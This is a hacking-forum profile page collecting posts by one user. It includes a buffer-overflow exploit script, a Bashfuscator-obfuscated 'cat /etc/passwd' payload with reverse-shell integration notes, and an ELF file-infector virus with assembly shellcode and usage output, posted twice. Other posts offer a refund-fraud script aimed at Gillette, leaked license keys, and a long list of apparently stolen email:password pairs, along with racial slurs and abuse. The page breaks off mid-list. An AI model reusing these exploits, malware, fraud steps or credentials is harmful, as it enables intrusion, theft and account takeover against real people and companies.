mesvak

Members
  • Content Count

    2,689
  • Last visited

  • Days Won

    4

Everything posted by mesvak

  1. i never tried it with c# tbh but tried it with java like 2 years ago and about 3 months ago there was a person who created a similar shit which is this guy https://github.com/trekawek/coffee-gb/tree/master/src/main/java/eu/rekawek/coffeegb/cpu But its written in java i can translate it to c# if u didnt get it just give a quick brief shit so basically for writing an emulator you needa consider 1- cpu ( timing and .....) 2- memory and dont forget you needa write diff script for each of them seemingly in this script that tbh i m a bit confused about what u written there cuase you cannot bind them without importing them APprently this is the case you working on } public OpcodeBuilder proceedIf(String condition) { ops.add(new Op() { @Override public boolean proceed(Registers registers) { switch (condition) { case "NZ": return !registers.getFlags().isZ(); case "Z": return registers.getFlags().isZ(); case "NC": return !registers.getFlags().isC(); case "C": return registers.getFlags().isC(); } And as a reminder you needa mention the the value of bit u going to use and what is z is it below z<8 bits or ......
  2. sir im the best pleb u can find how can i help u
  3. [hide] https://www.upload.ee/files/10066419/Israeel_IP.txt.html [/hide]
  4. [hide] https://pastr.io/view/YPKuVZ [/hide]
  5. [hide] A script to exploit it might look like this: from subprocess import * import struct p = Popen([r'ConsoleApplication4.exe', 'f'], stdout=PIPE, stdin=PIPE, stderr=STDOUT) enter="-1\n" p.stdin.write(enter) numero=struct.pack("c=struct.pack("key=struct.pack(" payload = "A" * 16 + numero + c + key + "\n" p.stdin.write(payload) testresult = p.communicate()[0] print(testresult) https://0x00sec.s3.amazonaws.com/original/2X/2/24bcdc4d09368a7b028dcc385a606ebcb68d161b.png[/img] We see that it happens -1 as number to pass the check when it compares with sign against 0x10 and then the 16 bytes to fill the buffer, then the number to which I passed a correct value of 0x34333231 because overflodear will change it, then c which can be any value and then the key 0x45934215. [/hide]
  6. Link: https://github.com/Bashfuscator/Bashfuscator Example obfuscated payload (input is cat /etc/passwd) : ): ${@~}eval "$(pr""i''n\t${@%%G}f "\x$(""${*##x:}prin""$'\x74'f %s 'P?'|${*//_f/M:}md5\s''\um|${@,,}c""\ut -b 24-25)""${@^^}";${*~~}prin''t\f "\x$(prin"${@,,}"tf %s '~'|${*%%>}m$'\144'5s$'\165'\m|${*##hG}$'\x63'$'\x75'${@##N|}t -b 4-5)";''${*%%Z}print$'\x66' "\x$(p''r$'\x69'n""\t$'\x66' %s '2['|md${*##+}5""sum|${@##l}cu${!@}t -b 17-18${@^^})"${*^}&&p""r""$'\151'ntf "\x$($'\x70'r${@/m}int$'\x66' %s '1'|${*,}m\d5${!*}su$'\155'|${*%%E}c${*%%#}ut -b 16-17)";$'\160'''\r$'\151'\n""t""${@,}f "\x$(p\rintf %s 't9'${*//i/wm}|${*/J\)}m"${@//j/6=}"d5s''um|"${@}"''c${*#L\{}u${*//0}t -b 2-3${*})"&&${*~~}pri''nt\f "\x$(p\ri$'\x6e't\f %s 'g}'${*//\!J}|$@m''${*~}d5su${@/99}m|${*/7}"${@,}"c''ut -b 2-3)""${@//#p/B\(}";p""${*#=}r${*/\{/]}in$'\x74'f "\x$(\p"${@,,}"rin$'\x74'\f %s 'sW'|md\5''su""m"${@//rR/#i}"|cut -b 7-8)"&&""\p$'\x72'$'\x69'nt\f "\x$(p""${*//3U}r${*,}in${*/me}t''f %s '.'${@%g}|''"${@~}"md\5$'\x73'${*%#X}um|"${@,}"""$'\x63'\u$'\x74' -b 13-14)"${*~}&&${@~~}$'\x70'r$'\x69'ntf "\x$(\printf %s 'g'${*#Jh}|md$'\65'""sum|""c\u\t -b 2-3${@^^})"&&${*~~}pri""\ntf "\x$(p''r''\i$'\156'''t''f %s 'fC'${*//F-/^}|${@,}m$'\x64'5sum|''cut -b 19-20)"${*,}&&"${@//9/*#}"pr''i\n"""${@~}"tf "\x$(${@,}p\r""$'\x69'$'\x6e'$*t\f %s 'ys'|$'\155'""d5sum$*|cu\t -b 12-13"${@^^}")"${@//yZ}&&p""$'\162'in$'\164'f "\x$(printf %s '('|${@}""md5''$'\163'''$'\x75'm|c$'\165'\t -b 7-8${*//\(P/k})"&&${*/rd}$'\160'${*//Q5/u}r"${@//3}"i${*~}n""tf "\x$(p\r${*//W}in$'\x74'f %s '{J'${*~}|md${@%%NA}5\sum|c$'\165'$'\x74' -b 27-28"${@^^}")"${*^^};printf "\x$(""p""rintf %s ';e'|m${@/4}d5sum|${!@}c''$'\x75't -b 3-4"${@,}")"&&$*${*^^}prin$'\x74'f "\x$(""p""\r"$@"i""\n''tf %s 'q;'"${@~~}"|${*,,}m''d5sum"${@~~}"|"${@,,}"cu''\t -b 14-15)")" Bashfuscator makes obfuscating Bash one-liners and scripts incredibly easy. It can be used from the command line, or as a Python library. You can manually specify commands or scripts for Bashfuscator to obfuscate, feed it stdin to obfuscate and pass output though a pipeline, or use it an existing Python 3 project. A great example of Bashfuscator’s use as a library is integration with a reverse or bind shell handler. In only 3 extra lines of code, every command you send through your reverse or bind shell will now be obfuscated transparently. Example: from bashfuscator.core.obfuscation_handler import ObfuscationHandler # socket code here obHandler = ObfuscationHandler() inputCmd = input("$ ") obfCommand = obHandler.genObfuscationLayer(inputCmd) # send command to reverse/bind shell EXAMPLE FOR PAYLOAD : https://asciinema.org/a/6LmMVyoxUbDIwvl5yzynVbrS1 Y OU CAN USE BASE 64 BTW BUT ITS EZ TO BE DECRYPTED
  7. this is so simple just you needa know knowing stuff in C/C++ knowing stuff in Intel x86 assembly Knowledge of the WinAPI and its documentation Knowledge of the PE file structure Knowledge of Dynamic Linked Libraries [hide] poc .c written in c++ https://pastr.io/view/sbYDYI and asmbelly code section .text global _start _start: sub r12, 0x4f20 push rax push rdi push rsi push rdx mov rax,1 ; [1] - sys_write mov rdi,1 ; 0 = stdin / 1 = stdout / 2 = stderr lea rsi,[rel msg] ; pointer(mem address) to msg (*char[]) mov rdx, msg_end - msg ; msg size syscall ; calls the function stored in rax pop rdx pop rsi pop rdi pop rax jmp r12 align 8 msg db 'Infected file Test',0x0a,0 msg_end db 0x0 and usage written by shitty hands $ cp / bin / uname evil_uname $ ./niga evil_uname ELF virus example Running in offset mode + Mapped file (35032 bytes) at 0x7fff7ae5a540 + Processing Victim -> Entry point value: 0x1f60 + Processing Victim -> Found .text segment executable (# 2) * Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990) offset == 0x4f20 $ #change offset on shellcoda.asm $ nasm -f elf64 shellcode.asm $ ./niga evil_uname shellcode.o ELF virus example + Mapped file (35032 bytes) at 0x7ffc51d5d920 + Processing Victim -> Entry point value: 0x1f60 + Processing Victim -> Found .text segment executable (# 2) * Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990) + Processing victim -> Base Address: 0x (nil) + Mapped file (704 bytes) in 0x7ffc51d5d928 + Payload Process -> Number of Sections in the Payload file: 5. Searching for the '.text' section + Processing payload -> sname: '' + Processing payload -> sname: '.text' has entered the returning if shdr-> sh_name: 1 shdr-> sh_type: 1 shdr-> sh_addr: 0 + Processing Payload -> Section .text Payload file found in offset 180 (Size: 4a bytes) $ ./evil_uname Infected file Test me no gae u are all retarded plebs Xd Linux [/hide]
  8. WELP WHAT IT ESSENTIALLY DO IS GET IPS WHICH ARE FAILED TO CONNECT TO UR VPS anD USE THAT IP AGAINST THEM LETS SEE THE SCRIPT IF U HAVE TROUBLE UNDERSTANDING IT TELL ME I WILL MAKE A GUIDE FOR IT [hide] #!/usr/bin/python3.4 #BY MESVAK import re import urllib.request import json log_path = "/var/log/auth.log" hosts = [] key = "{YOUR_API_KEY}" #GET FAILED PASSWORD ATTEMPT def get_host(test): for line in text.split('\n'): if line.find("Failed password for invalid ") != -1: if get_ip(line) not in hosts: hosts.append(get_ip(line)) return hosts #GET USERNAME def get_username(line): username_word = line.split("Failed password for invalid user ") username = (username_word[1]).split(" ") return username[0] #LOCATE IP WITH GEOIP def geoip(host): response = urllib.request.urlopen("http://freegeoip.net/json/"+host) geoip = response.read().decode("utf-8") geoip = json.loads(geoip) print("\n[+] Tracking ip {}".format(geoip['ip'])) print("-------------------------------") print('\tCountry : {}\n\ttimezone : {}\n\tlatitude : {}\n\tlongitude : {}'.format(geoip['country_name'],geoip['time_zone'],geoip['latitude'],geoip['longitude'])) def passive_recon(host,key): url = "https://api.shodan.io/shodan/host/{}?key={}&minify=true".format(host,key) try: response = urllib.request.urlopen(url) result = response.read().decode('utf-8') result = json.loads(result) print("[+] Passive Recon using shodan.io") print("-------------------------------") print("\tPort : {}\n\tOrganisation {}".format(result['ports'],result['org'])) for x in range(len(result['ports'])): print("Banner {}".format(result['data'][x]['data'])) except: print("[+] Passive Recon using shodan.io") print("-------------------------------") print("\tCan't retrieve information") pass if __name__ == "__main__": with open(log_path, 'rt') as log: text = log.read() get_host(text) for host in hosts: geoip(host) passive_recon(host,key) [/hide]
  9. this is so simple just you needa know knowing stuff in C/C++ knowing stuff in Intel x86 assembly Knowledge of the WinAPI and its documentation Knowledge of the PE file structure Knowledge of Dynamic Linked Libraries [hide] poc .c written in c++ https://pastr.io/view/sbYDYI and asmbelly code section .text global _start _start: sub r12, 0x4f20 push rax push rdi push rsi push rdx mov rax,1 ; [1] - sys_write mov rdi,1 ; 0 = stdin / 1 = stdout / 2 = stderr lea rsi,[rel msg] ; pointer(mem address) to msg (*char[]) mov rdx, msg_end - msg ; msg size syscall ; calls the function stored in rax pop rdx pop rsi pop rdi pop rax jmp r12 align 8 msg db 'Infected file Test',0x0a,0 msg_end db 0x0 and usage written by shitty hands $ cp / bin / uname evil_uname $ ./niga evil_uname ELF virus example Running in offset mode + Mapped file (35032 bytes) at 0x7fff7ae5a540 + Processing Victim -> Entry point value: 0x1f60 + Processing Victim -> Found .text segment executable (# 2) * Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990) offset == 0x4f20 $ #change offset on shellcoda.asm $ nasm -f elf64 shellcode.asm $ ./niga evil_uname shellcode.o ELF virus example + Mapped file (35032 bytes) at 0x7ffc51d5d920 + Processing Victim -> Entry point value: 0x1f60 + Processing Victim -> Found .text segment executable (# 2) * Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990) + Processing victim -> Base Address: 0x (nil) + Mapped file (704 bytes) in 0x7ffc51d5d928 + Payload Process -> Number of Sections in the Payload file: 5. Searching for the '.text' section + Processing payload -> sname: '' + Processing payload -> sname: '.text' has entered the returning if shdr-> sh_name: 1 shdr-> sh_type: 1 shdr-> sh_addr: 0 + Processing Payload -> Section .text Payload file found in offset 180 (Size: 4a bytes) $ ./evil_uname Infected file Test me no gae u are all retarded plebs Xd Linux [/hide]
  10. Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils THEY ARE LIL MONKEYS EVERY VERE WORSE THAN AN ASSHOLE IKR meme my instagram id :mesvak discord:mesvak#7842
  11. Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils THEY ARE LIL MONKEYS EVERY VERE WORSE THAN AN ASSHOLE IKR meme my instagram id :mesvak discord:mesvak#7842
  12. Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils THEY ARE LIL MONKEYS EVERY VERE WORSE THAN AN ASSHOLE IKR meme my instagram id :mesvak discord:mesvak#7842
  13. Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils THEY ARE LIL MONKEYS EVERY VERE WORSE THAN AN ASSHOLE IKR meme my instagram id :mesvak discord:mesvak#7842
  14. [hide] https://www.upload.ee/files/10066054/http_s_.txt.html [/hide]
  15. [hide] https://www.upload.ee/files/10066055/socks_4__5_.txt.html [/hide]
  16. [hide] :::::meSVak GC CHECKER V.22.:::::::8VFHJJ-7ZMSE2-5T46LS - Avast Premier : 10 days :::::meSVak GC CHECKER V.22.:::::::ND92J5-DY42KJ-5ZU6Y6 - Avast Internet security 40 days :::::meSVak GC CHECKER V.22.:::::::86KGNA-JQEZL2-4YL4YS - Avast Internet security+cleanup : 50 days :::::meSVak GC CHECKER V.22.:::::::SLHJS3-N8WGS2-5M46UN - Avast Cleanup : 50 days :::::meSVak GC CHECKER V.22.:::::::UMNRY4-VRPNC2-49U7YA - Avast Premier : 75 days :::::meSVak GC CHECKER V.22.:::::::CMPLHW-KFFKJJ-4C477J - Avast Internet security : 80 days :::::meSVak GC CHECKER V.22.:::::::PKZ4FU-FMY8WJ-54C4S6 - Avast Internet security : 89 days :::::meSVak GC CHECKER V.22.:::::::3FES3J-VQ43G2-4546AN - Avast Cleanup : 165 days :::::meSVak GC CHECKER V.22.:::::::CFQ3ES-LXTCMJ-5747EA - Avast Internet security : 190 days :::::meSVak GC CHECKER V.22.:::::::KPQSZB-9RWXBJ-4PL6R6 - Avast Internet security : 200 days :::::meSVak GC CHECKER V.22.:::::::AJ6JML-YNTGKJ-4ZC4RJ - Avast Pro antivirus : 300 days :::::meSVak GC CHECKER V.22.:::::::KLC7XG-92CFMJ-57L7F2 - Avast Internet security : 500 days [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils meme
  17. [hide] :::::meSVak GC CHECKER V.22.:::::::BH8P-XXPB-9X2A-G6E4-5FNS :::::meSVak GC CHECKER V.22.:::::::A7B8-X7N9-UABS-AACB-6DFP :::::meSVak GC CHECKER V.22.:::::::8ECC-XKBH-HX2W-F62E-W8W5 :::::meSVak GC CHECKER V.22.:::::::BN2W-XVBA-GMPU-XRS8-KTB2 :::::meSVak GC CHECKER V.22.:::::::WG5V-XPSV-A5NW-CJBG-X49W [/hide] Dont forget to lib a like all creds goes to mesvak cz i m the on who is leeching them XD respect me with u r fucking likes lils meme
  18. [hide] 1.) Head over to: https://gillette.com/en-us/contact-us I DID WITH GB 2.) You have 3 choice of contact: Live chat (simple, quick, and my favorite method), email (takes a while so not the best), and phone (quickest but you have to actually talk to someone). DONT do PHONE if u do not speak english or have some weakness prepare something like jug shit and say it if u think u cant speak fluently i choosed phone 2 times in my fucking shitty life XD suckers 3.) Head over to: https://www.amazon.com/ and find an expensive pack of Gillette replacement blades (Razors) ( I recommend doing packs less than $45 or the jig will be harder to execute). 4.) Now, through whichever contact method you choose, say something along the lines of "Hi! So I recently bought your (item you found on amazon) sucker and I was far from satisfied niga u know what i mean ! I usually love these razors and I actually bought a good amount as gifts for my relatives (yeah in my dreams .!.), but this pack kinda ruined my image of Gillette as a brand. (sucks mfer) I proceeded to use the blades and they just felt awful. XDfml and kys They were kinda rough and I ended up cutting my cheek with a few strokes. (hurts to much bitches) Also, about 2 days later, I noticed a red itchy rash on my skin. (ooof now im ugly af bastards) I went back to look at the razors and there was a weird clear liquid on them. (that was my cemen niga) I'm really annoyed cause now I wasted $45 (or whatever the price of the pack was), don't have any razors, (puted them in ur ass) and a weird rash on my skin". If there is anything you can do to help I would really appreciate it. Thanks".(Gtfo b4 i kill u ) 5.) They may ask for you to ship it back to them so they can inspect it for quality control, but just say you threw it out because you didn't want anything to do with them as the liquid was harmful to your skin. 6.) You will get you $45 prepaid visa card mailed to your house within 2 weeks. 7.) Jig Chat way only way sucker and wait till u get that shitt and dont forget to give me 20$ half half niga [/hide]
  19. [hide] Condition in python #mesvak is not ur lil gae bish age = 12 name = 'mesvak' language = 'python' if age == 12: print("age is 12") #output : age is 12 if age is 12: print("age is 12") #output : age is 12 if age == 13: print("ok") else: print("less than 13") #output : less than 13 if age == 14: print("age is 14") elif age == 13: print("age is 13") elif age == 12: print("age is 12") if age is not 13: print("age is not 13") #output : age is not 13 if age >= 12: print("ok") #output : ok if age <= 13: print("ok") #output : ok if age != 12: print("ok") # it wont be executed cuase mesvak age is 12 and its opposite if name == 'mesvak' and age == 13: print("welcome1") #output : this wont be executed cuase age is not 13 if name == 'mesvak' or age == 13: print("welcome") #output : welcome there is or if name == 'mesvak' and (age == 14 or language == 'python'): print("welcome") #output : welcome lst = [1, 2, 3 , 4] if 1 in lst: print("1 is in list") #output : 1 is in list if 6 not in lst: print("6 is not in list") #output : 6 is not in list age = 14 name = "mesvak" if age < 12 else "suck" print(name) #output : suck name = 'mesvak' if age < 15 else 'mesvak' if age > 15 else 'nigger' print(name) #output : mesvak if age < 15: if age > 15: print('vmesvak') else: print('mesvak') else: print('nigger') #output : mesvak name = (('vmesvak', 'suck')[age > 12]) print(name) #output : suck name = (('vmesvak', 'suck')[True]) print(name) #output : suck true means age == 14 name = ('nigger', 'babak')[age < 12] print(name) #output : nigger or name = ('nigger', 'babak')[False] #output : nigger name = (age < 20) and 'mesvak' or 'nigger' print(name) #output : mesvak name = {True: 'mesvak', False: 'nigger'}[age < 20] print(name) #output : mesvak name = ((age > 20) and ['mesvak'] or ['nigger']) print(name) #output : ['nigger'] name = ((age > 20) and ['mesvak'] or ['nigger'])[0] print(name) #output : nigger x = [True, True, False] if any(x): print("At least one True") #output : At least one True if all(x): print("Not one False") else: print("At least one False") #ouput : At least one False if any(x) and not all(x): print("At least one True and one False") #output : At least one True and one False [/hide]
  20. for doing this you needa get pyglet installed that s what we needa import tho so then we make our image welp the images needa be besides the program we have written Like for this example nigger.gif and niba.gif lets get ahead [hide] #mesvak is here boobies import pyglet animation=pyglet.image.load_animation('niggers.gif') animation1=pyglet.image.load_animation('niba.gif') #this one make it like watever u can do to that gif like i conssider niggers.gif an earth so we can rotate and .... animsprite=pyglet.sprite.sprite(animation) w=animsprite.width h=animsprite.height window=pyglet.window.window(w=width,h=height) r,g,b,suck=0.5,0.5,0.8,0.5 pyglet.gl.glclearcolor(r,g,b,suck) @window.event def on_draw(): window.clear() animsprite.draw() pyglet.app.run() [/hide]
  21. welp this one is gud and something like shitty af you wanna turn the webcam on and make one colorful image and one gray it is ez for doing that we needa use numpy and cv2 [hide] #mesvak dont publish without my gae premission import cv2 import numpy as np cap = cv2.VideoCapture(1) while True: ret, frame = cap.read() gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) cv2.imshow('frame', frame) cv2.imshow('gray', gray) if cv2.waitKey(1) & 0xFF == ord('q'): break cap.release() cv2.destoryAllWindows() [/hide]
  22. How to get ip, location , region ,organisation name ,country code , longitudal,latitude,area code , ,..... eveyrthing for taking revenge [hide] #mesvak author dont touch my balls pls import requests ip_request = requests.get('https://get.geojs.io/v1/ip.json') my_ip = ip_request.json()['ip'] print(my_ip) geo_request_url = 'https://get.geojs.io/v1/ip/geo/' + my_ip + '.json' geo_request = requests.get(geo_request_url) geo_data = geo_request.json() print(geo_data) [/hide]
  23. [hide] from smtplib import SMTP host="Nigger.gmail.com" port= 587 username= "[email protected]" password= "mesvak" from_email= username to_list= ("[email protected]", "[email protected]") CON= SMTP(host, port) CON.starttls() CON.login(username, password) CON.sendmail(from_email, to_list, "Hey") CON.quit() [/hide]
  24. [hide] $$$ NRD MES\/AK preMIUms [email protected]:mojaukochana | Expires: 2017-10-19 19:04:32 $$$ NRD MES\/AK preMIUms [email protected]:93567522 | Expires: 2018-03-21 16:17:15 $$$ NRD MES\/AK preMIUms [email protected]:nokia5630 | Expires: 2022-04-30 19:10:01 $$$ NRD MES\/AK preMIUms [email protected]:rohini12 | Expires: 2018-11-25 09:32:17 $$$ NRD MES\/AK preMIUms [email protected]:aff85432 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:091102 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:satyam2079 | Expires: 2019-03-17 07:03:25 $$$ NRD MES\/AK preMIUms [email protected]:rebelpunks | Expires: 2019-06-11 05:18:16 $$$ NRD MES\/AK preMIUms [email protected]:pringleshinoda91 | Expires: 2017-02-07 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:jordan23 | Expires: 2019-04-04 12:08:53 $$$ NRD MES\/AK preMIUms [email protected]:3328950 | Expires: 2016-08-09 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:surround | Expires: 2017-09-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:vietkhoi1512 | Expires: 2018-07-03 16:02:11 $$$ NRD MES\/AK preMIUms [email protected]:payton34 | Expires: 2018-09-12 19:56:54 $$$ NRD MES\/AK preMIUms [email protected]:allah1... | Expires: 2019-01-19 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:ilovedarkfall55 | Expires: 2018-01-24 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:11mai1997 | Expires: 2019-04-15 23:16:35 $$$ NRD MES\/AK preMIUms [email protected]:dianinha123 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:weiwei95 | Expires: 2019-04-27 14:27:00 $$$ NRD MES\/AK preMIUms [email protected]:Honda672 | Expires: 2017-10-28 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:rkolegend0 | Expires: 2018-04-03 03:34:27 $$$ NRD MES\/AK preMIUms [email protected]:ivannino1509 | Expires: 2018-08-04 14:41:47 $$$ NRD MES\/AK preMIUms [email protected]:Luis10s* | Expires: 2018-06-27 20:41:34 $$$ NRD MES\/AK preMIUms [email protected]:gugu1297 | Expires: 2018-05-23 22:07:00 $$$ NRD MES\/AK preMIUms [email protected]:simarjeet | Expires: 2018-06-13 06:47:34 $$$ NRD MES\/AK preMIUms [email protected]:Yangus01 | Expires: 2017-09-19 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:karabakh7 | Expires: 2019-05-11 11:40:12 $$$ NRD MES\/AK preMIUms [email protected]:3ffw3cjv | Expires: 2018-05-30 19:14:20 $$$ NRD MES\/AK preMIUms [email protected]:gopher | Expires: 2018-01-14 18:37:50 $$$ NRD MES\/AK preMIUms [email protected]:5nicker5 | Expires: 2019-05-29 00:04:27 $$$ NRD MES\/AK preMIUms [email protected]:hanadulset252555 | Expires: 2019-05-24 21:47:15 $$$ NRD MES\/AK preMIUms [email protected]:nebula12 | Expires: 2018-08-28 17:27:51 $$$ NRD MES\/AK preMIUms [email protected]:ilovefidji002 | Expires: 2018-12-21 12:43:22 $$$ NRD MES\/AK preMIUms [email protected]:mrmean123 | Expires: 2019-04-07 16:22:02 $$$ NRD MES\/AK preMIUms [email protected]:koqefapi123 | Expires: 2017-12-24 20:17:50 $$$ NRD MES\/AK preMIUms [email protected]:mannen11 | Expires: 2019-12-25 13:17:33 $$$ NRD MES\/AK preMIUms [email protected]:nikon401 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:december16 | Expires: 2018-06-16 08:47:59 $$$ NRD MES\/AK preMIUms [email protected]:killer93 | Expires: 2017-11-05 10:16:30 $$$ NRD MES\/AK preMIUms [email protected]:gatilyadav25 | Expires: 2017-06-21 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:edgypreppy | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:shakti09031987 | Expires: 2018-04-18 11:44:29 $$$ NRD MES\/AK preMIUms [email protected]:so820502 | Expires: 2018-06-27 02:50:38 $$$ NRD MES\/AK preMIUms [email protected]:12qazxsw | Expires: 2018-09-16 14:49:16 $$$ NRD MES\/AK preMIUms [email protected]:ronald2012 | Expires: 2018-04-28 11:53:43 $$$ NRD MES\/AK preMIUms [email protected]:magic144 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:64511142 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:grognyuo | Expires: 2018-11-28 14:17:30 $$$ NRD MES\/AK preMIUms [email protected]:boneless14 | Expires: 2019-03-28 16:06:53 $$$ NRD MES\/AK preMIUms [email protected]:volcom | Expires: 2018-01-04 16:48:05 $$$ NRD MES\/AK preMIUms [email protected]:molfetta1 | Expires: 2018-02-28 11:00:52 $$$ NRD MES\/AK preMIUms [email protected]:rowlett20 | Expires: 2019-05-07 22:56:06 $$$ NRD MES\/AK preMIUms [email protected]:jklmo09 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:lifan123 | Expires: 2019-08-19 13:03:07 $$$ NRD MES\/AK preMIUms [email protected]:mammapappa | Expires: 2018-08-25 23:23:23 $$$ NRD MES\/AK preMIUms [email protected]:frings22 | Expires: 2019-02-14 19:21:44 $$$ NRD MES\/AK preMIUms [email protected]:samandar | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:dawn847310 | Expires: 2018-10-05 12:03:55 $$$ NRD MES\/AK preMIUms [email protected]:mjkop123 | Expires: 2017-09-13 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:giantpandas | Expires: 2018-01-20 08:03:42 $$$ NRD MES\/AK preMIUms [email protected]:t8c8xney | Expires: 2018-09-11 20:12:17 $$$ NRD MES\/AK preMIUms [email protected]:auroranira9 | Expires: 2019-06-26 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:takiza11 | Expires: 2019-02-26 09:33:03 $$$ NRD MES\/AK preMIUms [email protected]:zulamabu1 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:sama2869 | Expires: 2018-08-09 08:41:32 $$$ NRD MES\/AK preMIUms [email protected]:jimned11 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:lamar123 | Expires: 2019-02-19 00:57:55 $$$ NRD MES\/AK preMIUms [email protected]:pariksha871 | Expires: 2019-01-09 21:40:30 $$$ NRD MES\/AK preMIUms [email protected]:bellman11 | Expires: 2020-03-26 13:15:44 $$$ NRD MES\/AK preMIUms [email protected]:bellman11 | Expires: 2020-03-26 13:15:44 $$$ NRD MES\/AK preMIUms [email protected]:nicksean1 | Expires: 2018-07-24 23:48:54 $$$ NRD MES\/AK preMIUms [email protected]:Toyotamr2 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:Barza123 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:xcheater | Expires: 2018-06-21 17:50:11 $$$ NRD MES\/AK preMIUms [email protected]:asd123 | Expires: 2018-02-25 11:30:17 $$$ NRD MES\/AK preMIUms [email protected]:bossnick01 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:Mercedes600 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:rover200 | Expires: 2019-08-02 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:Strada83 | Expires: 2019-05-26 14:28:20 $$$ NRD MES\/AK preMIUms [email protected]:barileva | Expires: 2017-11-06 14:38:24 $$$ NRD MES\/AK preMIUms [email protected]:Oposite99 | Expires: 2017-12-20 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:22662266 | Expires: 2016-11-09 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:11019790 | Expires: 2019-05-07 10:49:43 $$$ NRD MES\/AK preMIUms [email protected]:1998angel | Expires: 2022-01-15 11:27:26 $$$ NRD MES\/AK preMIUms [email protected]:artichokes99 | Expires: 2018-10-04 02:29:07 $$$ NRD MES\/AK preMIUms [email protected]:@tonti@5 | Expires: 2017-12-12 11:50:00 $$$ NRD MES\/AK preMIUms [email protected]:371654ma | Expires: 2019-06-14 03:09:44 $$$ NRD MES\/AK preMIUms [email protected]:ji3g4g4d93 | Expires: 2018-05-02 14:37:40 $$$ NRD MES\/AK preMIUms [email protected]:bip2121 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:marc1122 | Expires: 2018-08-15 22:44:25 $$$ NRD MES\/AK preMIUms [email protected]:c476234 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:gonzoopera | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:yakiniku43 | Expires: 2019-05-21 07:55:18 $$$ NRD MES\/AK preMIUms [email protected]:a1b2c3d4 | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:fatema22 | Expires: 2018-05-13 21:26:42 $$$ NRD MES\/AK preMIUms [email protected]:manchester | Expires: 2019-05-31 02:59:47 $$$ NRD MES\/AK preMIUms [email protected]:seksi2kali | Expires: 2001-01-01 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:22terryc | Expires: 2018-08-26 20:05:02 $$$ NRD MES\/AK preMIUms [email protected]:speedious | Expires: 2018-02-03 06:18:07 $$$ NRD MES\/AK preMIUms [email protected]:hudahina1 | Expires: 2019-05-06 06:36:41 $$$ NRD MES\/AK preMIUms [email protected]:sports87 | Expires: 2018-10-10 13:38:38 $$$ NRD MES\/AK preMIUms [email protected]:heiddis17 | Expires: 2021-12-10 12:39:19 $$$ NRD MES\/AK preMIUms [email protected]:1804ali2004 | Expires: 2018-05-02 14:10:53 $$$ NRD MES\/AK preMIUms [email protected]:21ap1991 | Expires: 2018-06-21 21:21:28 $$$ NRD MES\/AK preMIUms [email protected]:melonb3 | Expires: 2017-07-03 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:0124942120 | Expires: 2017-12-14 21:58:30 $$$ NRD MES\/AK preMIUms [email protected]:sagitarius | Expires: 2020-03-23 08:51:41 $$$ NRD MES\/AK preMIUms [email protected]:5codered5 | Expires: 2018-03-21 19:55:43 $$$ NRD MES\/AK preMIUms [email protected]:skyland2 | Expires: 2018-04-17 06:25:46 $$$ NRD MES\/AK preMIUms [email protected]:sasu1996 | Expires: 2017-09-17 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:10cerocero | Expires: 2018-07-04 14:18:00 $$$ NRD MES\/AK preMIUms [email protected]:ji3yrs2011 | Expires: 2016-06-17 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:Armour8630 | Expires: 2018-07-23 10:30:06 $$$ NRD MES\/AK preMIUms [email protected]:wolverine | Expires: 2017-07-26 00:00:00 $$$ NRD MES\/AK preMIUms [email protected]:boeing1941 | Expires: 2018-09-23 09:52:44 $$$ NRD 